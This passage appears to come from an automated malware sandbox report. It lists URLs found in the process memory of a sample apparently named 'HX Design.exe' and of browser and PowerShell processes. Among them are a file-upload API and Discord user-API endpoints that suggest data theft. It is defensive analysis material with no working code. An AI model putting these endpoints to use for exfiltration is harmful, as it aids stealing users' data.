                                                  https://anglebug.com/7714chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.anonfiles.com/uploadHX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.google.com/0(pchrome.exe, 0000003A.00000002.1925562449.00002F0400164000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://unisolated.invalid/chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://anglebug.com/8215gchrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.google.com/ngTypechrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://discord.com/api/v9/users/HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anglebug.com/6248chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anglebug.com/6929chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.dhimyotis.com/certignarootca.crlHX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://curl.haxx.se/rfc/cookie_spec.htmlHX Design.exe, 00000001.00000002.2101621757.00000294B5270000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://repository.swisssign.com/RHX Design.exe, 00000001.00000003.2092472989.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B53EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://anglebug.com/5281chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.google.comC:chrome.exe, 0000003A.00000002.1917350022.000001C518090000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1917774956.00000143C5200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameHX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyHX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://issuetracker.google.com/255411748msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://anglebug.com/7246chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://anglebug.com/7369chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://anglebug.com/7489chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://wwww.certigna.fr/autorites/0mHX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerHX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/python/cpython/issues/86361.HX Design.exe, 00000001.00000003.1702384127.00000294B4AB2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1702130112.00000294B4695000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://httpbin.org/HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://crl.ver)svchost.exe, 0000003C.00000002.2922318040.00000298F7800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://anglebug.com/7319vmsedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sHX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleHX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesHX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://issuetracker.google.com/161903006msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535HX Design.exe, 00000001.00000003.1706757467.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099002748.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://anglebug.com/3078chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/7553chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://anglebug.com/5375chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crl.securetrust.com/STCA.crlHX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/5371chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/4722chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://anglebug.com/5421Ochrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://tools.ietf.org/html/rfc6125#section-6.4.3HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/vmsedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.quovadisglobal.com/cpsrHX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/7556chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.cert.fnmt.es/dpcs/HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://google.com/mailHX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.accv.es00HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/7406/chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://mahler:8092/site-updates.pyHX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.google.comxmsedge.exe, 0000003B.00000002.1923306413.00006FA400298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://anglebug.com/2162vmsedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://anglebug.com/6692chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://issuetracker.google.com/258207403msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://ocsp.sectigo.com0HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/3502chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/3623msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/3625msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/3624msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/5007chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://discordapp.com/api/v9/users/HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/3862rchrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://www.firmaprofesional.com/cps0HX Design.exe, 00000001.00000002.2099002748.00000294B4650000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://ocsp.accv.esiHX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specHX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://issuetracker.google.com/issues/166475273msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2920HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://crl.securetrust.com/SGCA.crl0HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://anglebug.com/7161/chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataHX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/5281zchrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://anglebug.com/4384msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
